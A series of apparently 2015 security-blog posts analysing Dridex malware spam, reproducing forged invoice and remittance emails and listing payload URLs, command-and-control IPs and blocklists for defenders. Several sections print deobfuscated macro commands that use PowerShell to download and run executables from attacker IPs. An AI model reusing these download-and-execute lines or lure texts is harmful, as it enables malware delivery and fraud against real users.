Malware spam: "Bobby Drell [rob@abbottpainting.com]" / "Brochure2.doc"

This spam does not come from Bobby Drell or Abbott Painting, instead it is a simple forgery with a malicious attachment.

From:    Bobby Drell [rob@abbottpainting.com]
Date:    5 March 2015 at 10:27
Subject:    Brochure2.doc

Please change the year to 2015.
Please confirm receipt
Thanks
Bobby Drell

Attached is a file Brochure2.doc which has a low detection rate which contains this malicious macro [pastebin] which downloads a component from the following location:

http://data.gmsllp.com/js/bin.exe

This is saved as %TEMP%\324235235.exe. Note that there may be different versions of this document that download files from different locations, but the payload should be identical. In this case the executable has a detection rate of 4/57.

Automated analysis tools [1] [2] show it phoning home to the following IPs:

92.63.87.13 (MWTV, Latvia)
95.163.121.200 (Digital Networks aka DINETHOSTING, Russia)

Usually this will drop a malicious Dridex DLL, although I was not able to obtain a sample.

Recommended blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
95.163.121.0/24

Malware spam: "John Donald [john@kingfishermanagement.uk.com]" / "Document1"

This rather terse email comes with a malicious attachment:

From:    John Donald [john@kingfishermanagement.uk.com]
Date:    4 March 2015 at 09:09
Subject:    Document1

There is no body text, but there is an attachment Document1.doc which is not currently detected by AV vendors, in turn it contains this malicious macro [pastebin] which downloads another component from the following location:

http://retro-moto.cba.pl/js/bin.exe

Note that there may be other different versions of this document with different download locations, but it should be an identical binary that is downloaded. This file is saved as %TEMP%\GHjkdjfgjkGKJ.exe and has a VirusTotal detection rate of 2/57.

Automated analysis tools [1] [2] show attempted network traffic to the following IPs:

92.63.87.13 (MWTV, Latvia)
104.232.32.119 (Net3, US)
87.236.215.103 (OneGbits, Lithunia)
108.61.198.33 (Gameservers.com / Choopa LLC, Netherlands)

According to the Malwr report it also drops another version of itself with a detection rate of just 1/57 plus a DLL with a detection rate of 7/56.

Recommended blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
104.232.32.119
87.236.215.103
108.61.198.33

Malware spam: "Dennys Invoice INV650988" / "accounts@dennys.co.uk"

This fake invoice email is not from Dennys but is a simple forgery with a malicious attachment. Dennys are not sending the spam, and their systems have not been compromised in any way.

From:    accounts@dennys.co.uk
Date:    27 February 2015 at 09:14
Subject:    Dennys Invoice INV650988

To view the attached document, you will need the Microsoft Word installed on your system.

So far I have only seen a single sample, with an attachment INV650988.doc which has a VirusTotal detection rate of exactly zero. This contains this malicious macro [pastebin] which downloads another component from the following location:

http://hew.homepage.t-online.de/js/bin.exe

This is saved as %TEMP%\324235235.exe and has a VirusTotal detection rate of 1/57.

According to the Malwr report, this executable then goes on and downloads another version of itself and a config file from:

http://apartmentprofile.su/conlib.php
http://paczuje.cba.pl/java/bin.exe

It drops several files, KB2896~1.EXE [VT 3/57], edg2.exe [VT 3/57] and a Dridex DLL which is much more widely detected (and we saw this same DLL yesterday). (If you have a Malwr account you can download a copy of everthing from here)

Between the Malwr and VirusTotal analyses, we see attempts to communicate with the following IPs:

198.52.200.15 (Centarra Networks, US)
95.211.144.65 (Leaseweb, Netherlands)
195.114.0.64 (SuperHost.pl, Poland)
92.63.87.13 (MWTV, Latvia)
78.140.164.160 (Webazilla, US)
59.97.137.171 (Broadband Multiplay Project, India)
104.232.32.119 (Net 3, US)

Some of these are shared hosting, I recommend for maximum protection that you apply the following blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
198.52.200.15
78.140.164.160
59.97.137.171
104.232.32.119

Malware spam: "Chris Christou [chris.christou@greysimmonds.co.uk]" / "Copy invoices"

This fake invoice spam comes with a malicious attachment:

From:    Chris Christou [chris.christou@greysimmonds.co.uk]
Date:    26 February 2015 at 10:45
Subject:    Copy invoices

Hello ,

Please find copy invoices attached as per our telephone conversation.

Kind regards,

Chris

Chris Christou
Credit Control
Grey Simmonds
Cranes Point
Gardiners Lane South
Basildon
Essex SS14 3AP
Tel:  0845 130 9070
Fax: 0845 370 9071
Email:  chris.christou@greysimmonds.co.uk
Web: www.greysimmonds.com

P  “Think before you Print” - Please consider the environment before printing this e-mail

It does NOT come from Grey Simmons, nor have their systems been compromised in any way. Instead, this is a simple forgery.

I have only seen one sample so far, with an attachment IGM135809.doc [detection rate 0/57] which contains this malicious macro [pastebin] which downloads a further component from:

http://xomma.net/js/bin.exe

This is saved as %TEMP%\GVhjJJVJH.exe and has a VirusTotal detection rate of 4/56. Automated analysis tools [1] [2] show it attempting to phone home to the following IPs:

92.63.87.13 (MWTV, Latvia)
78.140.164.160 (Webazilla, US)
86.104.134.156 (One Telecom, Moldova)
104.232.32.119 (Net 3, US)

This Malwr report shows dropped files with an MD5 of 590fc032ac747d970eb8818671f2bbd3 [VT 3/57] and 1997b0031ad702c8347267db0ae65539 [VT 4/57].

Recommended blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
78.140.164.160
86.104.134.156
104.232.32.119

Multiple spam emails using malicious XLS or XLSM attachment

I'm seeing multiple spam runs (probably pushing the Dridex banking trojan) with no body text, various subjects and either an XLS or XLSM attachment.

Example subjects include:
Copy [ID:15E376774] attaced
RE: Requests documentation [458C28133]
Request error [C3843]
Request error [FDF396530]
Requests documentation [242B035667]

Attachments look something similar to this:
15E376774.xlsm
242B035667.xlsm
458C28133.xls
C3843.xls
FDF396530.xlsm

The XLS and XLSM files are different structurally.. the XLSM files are basically an Office 2007 ZIP archive of all the data components, the XLS files are an old school Office 2003 file. Nevertheless, they contain a macro with 23 components to make it harder to analyse, although the important modules are Module 11 which contains the text string to decrypt, and Module 14 which contains the decryption function itself. Almost everything else is irrelevant.

Once the string is decrypted, it becomes fairly obvious what it going on. So far, there appear to be four strings with different download locations:

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://5.196.243.7/kwefewef/fgdsee/dxzq.jpg','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://46.30.42.151/kwefewef/fgdsee/dxzq.jpg','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://176.31.28.235/kwefewef/fgdsee/dxzq.jpg','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://92.63.88.63/kwefewef/fgdsee/dxzq.jpg','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

So, we can see a file dxzq.jpg being downloaded which is actually a CAB file (JIOiodfhioIH.cab) which is then expanded to JIOiodfhioIH.exe and then run.

For information, these IPs are hosted by:

5.196.243.7 (OVH, Ireland)
46.30.42.151 (Eurobtye LLC, Russia)
176.31.28.235 (OVH, France)
92.63.88.63 (MWTV, Latvia)

This executable has a detection rate of 4/56. Automated analysis [1] [2] [3] shows attempted network connections to:

82.151.131.129 (Doruknet, Turkey)
121.50.43.175 (Tsukaeru.net, Japan)
74.208.68.243 (1&1, US)

The Malwr report shows that it also drops a DLL with a detection rate of just 1/56.

Recommended blocklist:
82.151.131.129
121.50.43.175
74.208.68.243
5.196.243.7
46.30.42.151
176.31.28.235
92.63.88.63

For research purposes, a copy of the files analysed and dropped can be found here, password is infected

Malware spam: "AR.Support@efi.com" / "Customer statement 0001031389 as on 02/05/2015"

This fake financial document has a malicious attachment:

From:    AR.Support@efi.com
To:    minutemanpresschicago@comcast.net
Date:    17 February 2015 at 10:22
Subject:    Customer statement 0001031389 as on 02/05/2015

Dear EFI Customer,


Please find attached your statement for this month. If you need invoice
copies or have any questions you can reply to this e mail and we will
contact you at the earliest.


Regards,
AR Support
AR.Support@efi.com


** Attention AP Department ** Effective April 25th our new remittance address will change to
the following. Please update your records. Thank you.

PO Box 742366
Los Angeles, CA. 90074-2366

Confidentiality notice: This message may contain confidential information. It is intended only for the person to whom it is addressed. If you are not that person, you should not use this message. We request that you notify us by replying to this message, and then delete all copies including any contained in your reply. Thank you.

Attached is a Word document Customer statement 0001031389 as on 02052015.DOC which comes in two different types with zero detection rates [1] [2] containing two highly obfuscated modular macros [1] [2]  that actually just perform a ROT13 transformation on a couple of strings.

uggc://zjpbq4.pon.cy/wf/ova.rkr
uggc://nyhpneqban.pbz/wf/ova.rkr

Which decodes to:

http://mwcod4.cba.pl/js/bin.exe
http://alucardona.com/js/bin.exe

This has a VirusTotal detection rate of 5/57. Automated analysis tools [1] [2] [3] shows the malware attempting to connect to:

202.44.54.5 (World Internetwork Corporation, Thailand)
66.110.179.66 (Microtech Tel, US)
92.63.88.105 (MWTV, Latvia)

According to the Malwr report this drops a DLL with a detection rate of 2/57 which is probably Dridex.

Recommended blocklist:
202.44.54.5
66.110.179.66
92.63.88.105

Malware spam: "Re: Data request [ID:91460-2234721]" / "Copy of transaction"

This rather terse spam comes with a a malicious attachment:

From: Rosemary Gibbs
Date:    16 February 2015 at 10:12
Subject:    Re: Data request [ID:91460-2234721]

Copy of transaction.

The sender's name, the ID: number and the name of the attachment vary in each case. Example attachment names are

869B54732.xls
BE75129513.xls
C39189051.xls

None of the three attachments are detected by anti-virus vendors [1] [2] [3]. They each contain a slightly different macro [1] [2] [3]. The critical part of the encoded macro looks like this (click to enlarge):

It's quite apparent that this is ROT13 encoded which you can easily decrypt at rot13.com rather than working through the macro. These three samples give us:

"cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://85.143.166.140/fdhtepopdhd/sfbwurwfl/wyxbdf.exe','%TEMP%\JIOiodfhioIH.exe');Start-Process '%TEMP%\JIOiodfhioIH.exe';" 

"cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://92.63.88.104/fdhtepopdhd/sfbwurwfl/wyxbdf.exe','%TEMP%\JIOiodfhioIH.exe');Start-Process '%TEMP%\JIOiodfhioIH.exe';" 

"cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://5.196.175.140/fdhtepopdhd/sfbwurwfl/wyxbdf.exe','%TEMP%\JIOiodfhioIH.exe');Start-Process '%TEMP%\JIOiodfhioIH.exe';"

So, these macros are attempting to use Powershell to download and execute the next step (possibly to avoid the UAC popup). The downloaded binary has a VirusTotal detection rate of 3/57 and automated analysis tools [1] [2] [3] show attempted communications with:

85.143.166.72 (Pirix, Russia)
205.185.119.159 (FranTech Solutions, US)
92.63.88.87 (MWTV, Latvia)
173.226.183.204 (TW Telecom, Taiwan)
27.5.199.115 (Hathway Cable and Datacom, India)
149.171.76.124 (University Of New South Wales, Australia)
46.19.143.151 (Private Layer, Switzerland)

It also drops a DLL with a 4/57 detection rate which is the same malware seen in this attack.

Recommended blocklist:
85.143.166.72
205.185.119.159
92.63.88.87
173.226.183.204
27.5.199.115
149.171.76.124
46.19.143.151

Malware spam: "Remittance XX12345678"

This spam comes from randomly-named companies, with slightly different body text and different subject in each case. Here is an example:

From:    Gale Barlow
Date:    13 February 2015 at 12:30
Subject:    Remittance IN56583285

Dear Sir/Madam,

I hope you are OK. I am writing you to let you know that total amount specified in the contract has been paid into your bank account on the 12th of February at 15:25 via BACS payment system and should reach the destination (beneficiary's) account within 3 working days.
To see full payment details please refer to the remittance advice note attached to the letter.

Any queries? Please reply back with your questions and you will receive a prompt and qualitative response as soon as possible. Please do not hesitate to write us.

Gale Barlow
Accounts Manager
4D PHARMA PLC


Boyd Huffman
Accounts Payable
GETECH GROUP 

There is a malicious Word document attached to the email, so far I have only seen one version of this but usually there are two or more. The document itself has a low detection rate of 1/57 and it contains a malicious macrowhich downloads a file from the following location:

http://62.76.188.221/aksjdderwd/asdbwk/dhoei.exe

This is saved as %TEMP%\dsHHH.exe and has a detection rate of 7/57, identifed as a Dridex downloader. Automated analysis tools [1] [2] [3] [4] show a variety of activities, including communications with the following  IPs:

85.143.166.72 (Pirix, Russia)
46.19.143.151 (Private Layer, Switzerland)
193.206.162.92 (Universita degli Studi dell'Insubria, Italy)
92.63.88.87 (MWTV, Latvia)
78.129.153.18 (iomart, UK)
205.185.119.159 (Frantech Solutions, US)
The malware then drops a Dridex DLL with a detection rate of 3/52  and mysteriously drops another Dridex downloader with a detection rate of 6/57. The Malwr report for that indicates there is some attempting traffic to nonexistent domains.

Recommended blocklist:
85.143.166.72
46.19.143.151
193.206.162.92
92.63.88.87
78.129.153.18
205.185.119.159

Malware spam: "Your latest e-invoice from.."

This fake invoice spam has a malicious attachment:

From:    Lydia Oneal
Date:    11 February 2015 at 09:14
Subject:    Your latest e-invoice from HSBC HLDGS

Dear Valued Customer,


Please find attached your latest invoice that has been posted to your online account. You’ll be pleased to know that your normal payment terms still apply as detailed on your invoice.

Rest assured, we operate a secure system, so we can confirm that the invoice DOC originates from HSBC HLDGS and is authenticated with a digital signature.

Thank you for using e-invoicing with HSBC HLDGS - the smarter, faster, greener way of processing invoices.

This message and any attachment are confidential and may be privileged or otherwise protected from disclosure.
If you are not the intended recipient, please telephone or email the sender and delete this message and any attachment from your system.
If you are not the intended recipient you must not copy this message or attachment or disclose the contents to any other person.

The company name and the name of the sender varies, but most of the body text remains identical. Some sample subjects are:

Your latest e-invoice from HSBC HLDGS
Your latest e-invoice from MAVEN INCOME & GROWTH VCT 3 PLC
Your latest e-invoice from DDD GROUP PLC
Your latest e-invoice from BAILLIE GIFFORD SHIN NIPPON
Your latest e-invoice from ACAL
Your latest e-invoice from PARAGON DIAMONDS LTD
Your latest e-invoice from TULLETT PREBON PLC
Your latest e-invoice from MERSEY DOCKS & HARBOUR CO
Your latest e-invoice from HOLDERS TECHNOLOGY
Your latest e-invoice from LED INTL HLDGS LTD 
Your latest e-invoice from HALOS
Your latest e-invoice from ACORN INCOME FUND
Your latest e-invoice from BLACKROCK WORLD MINING TRUST PLC
Your latest e-invoice from NATURE GROUP PLC
Your latest e-invoice from OPTOS
Your latest e-invoice from MENZIES(JOHN)
Your latest e-invoice from ATLANTIC COAL PLC

The word document is randomly-named, for example 256IFV.doc, 19093WZ.doc and 097DVN.doc. There are three different versions of this malicious document, all with low detection rates [1] [2] [3] containing a slightly different macro in each case [1] [2] [3]. If we deobfuscate the macro, we see some code like this:

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://136.243.237.222:8080/hhacz45a/mnnmz.php','%TEMP%\pJIOfdfs.exe');Start-Process '%TEMP%\pJIOfdfs.exe';

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://185.48.56.62:8080/hhacz45a/mnnmz.php','%TEMP%\pJIOfdfs.exe');Start-Process '%TEMP%\pJIOfdfs.exe';

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://95.163.121.216:8080/hhacz45a/mnnmz.php','%TEMP%\pJIOfdfs.exe');Start-Process '%TEMP%\pJIOfdfs.exe';

The macro is calling Powershell to download and execute code from these locations:

http://136.243.237.222:8080/hhacz45a/mnnmz.php (Hetzer, Germany)
http://185.48.56.62:8080/hhacz45a/mnnmz.php (Sinarohost, Netherlands)
http://95.163.121.216:8080/hhacz45a/mnnmz.php (Digital Networks aka DINETHOSTING, Russia)

The code is downloaded as zzcasr.exe and is then saved as %TEMP%\pJIOfdfs.exe. This binary is of course malicious, with a detection rate of 5/57.

Automated analysis tools [1] [2] [3] [4] [5] show that it attempts to contact the following IPs:

85.143.166.72 (Pirix, Russia)
92.63.88.97 (MWTV, Latvia)
205.185.119.159 (FranTech Solutions, US)
78.129.153.18 (IOmart, UK)
5.14.26.146 (RCS & RDS Residential, Romania)

The malware probably drops a Dridex DLL, although I have not been able to obtain this.

Recommended blocklist:
85.143.166.72
92.63.88.97
205.185.119.159
78.129.153.18
5.14.26.146
136.243.237.222
185.48.56.62
95.163.121.216

(Note, for researchers only a copy of the files can be found here, password=infected)

Malware spam: "Circor [_CIG-EDI@circor.com]" / "CIT Inv# 15000375 for PO# SP14161"

This fake finance spam pretends to be from the wholly legitimate firm Circor, but it is not. Instead, it is a forgery with a malicious Word document attached.

From:    Circor [_CIG-EDI@circor.com]
Date:    3 February 2015 at 09:56
Subject:    CIT Inv# 15000375 for PO# SP14161

Please do not respond to this email address.  For questions/inquires, please
contact our Accounts Receivable Department.


______________________________________________________________________
This email has been scanned by the MessageLabs outbound
Email Security System for CIRCOR International Inc.
For more information please visit http://www.symanteccloud.com
______________________________________________________________________

Don't be fooled by the email signature, the attachment is definitely nasty. So far I have only seen one version with a detection rate of 4/55, which contains a malicious macro [pastebin] that downloads a component from:

http://gloo.ng/js/bin.exe

..which is then saved as %TEMP%\\dsfsdf.exe. This has a VirusTotal detection rate of 3/48 (it is identified as a Dridex component). According to the Malwr report, this phones home to a couple of IPs that I haven't seen before:

143.107.17.183 (Universidade De Sao Paulo, Brazil)
92.63.88.108 (MWTV SIA, Latvia)

It also drops a DLL with a detection rate of 3/56.

Recommended blocklist:
143.107.17.183
92.63.88.108

"Remittance Advice" spam comes with a malicious Excel attachment

This fake remittance advice comes with a malicious Excel attachment.

From:    Whitney
Date:    23 December 2014 at 09:12
Subject:    Remittance Advice -DPRC93

Confidentiality and Disclaimer:  This email and its attachments are intended for the addressee only and may be confidential or the subject of legal privilege.
If this email and its attachments have come to you in error you must take no action based on them, nor must you copy them, distribute them or show them to anyone.
Please contact the sender to notify them of the error.

---

This email and any attached files have been scanned for the presence of computer viruses. However, you are advised that you open any attachments at your own risk.
Please note that electronic mail may be monitored in accordance with the Telecommunications (Lawful Business Practices)(Interception of Communications) Regulations 2000.

The reference in the subject varies, and the name of the attachment always matches (so in this case DPRC93.xls). There are in fact three different versions of the document, all of which have a malicious macro. At the moment, this is poorly-detected by AV vendors [1] [2] [3] [4].

If you read this blog regularly then you might have seen me mention these attacks many times before, and most of these have a familiar pattern. However, the macro has now changed completely, as it now loads some of the data from the Excel spreadsheet itself.

The macro itself looks like this [pastebin] and as far as I can tell from it, it loads some data from the Excel spreadsheet and puts it into a file %TEMP%\windows.vbs. So far I have seen four different scripts [1] [2] [3] [4] which download a component from one of the following locations:

http://185.48.56.133:8080/sstat/lldvs.php
http://95.163.121.27:8080/sstat/lldvs.php
http://92.63.88.100:8080/sstat/lldvs.php
http://92.63.88.106:8080/sstat/lldvs.php

It appears that this email is downloaded as test.exe and is then saved as %TEMP%\servics.exe.

The ThreatExpert report shows traffic to the following:

194.146.136.1 (PE "Filipets Igor Victorovych", Ukraine)
80.237.255.196 (Denes Balazs / HostEurope, Germany)
85.25.20.107 (PlusServer AG, Germany)

VirusTotal indicates a detection rate of just 3/54, and identifies it as Dridex.

Recommended blocklist:
194.146.136.1
80.237.255.196
85.25.20.107
185.48.56.133
95.163.121.27
92.63.88.100
92.63.88.106

Note that there are two IPs acting as downloaders in the 92.63.88.0/24 range (MWTV, Latvia). It may be that you would also want to block that range as well.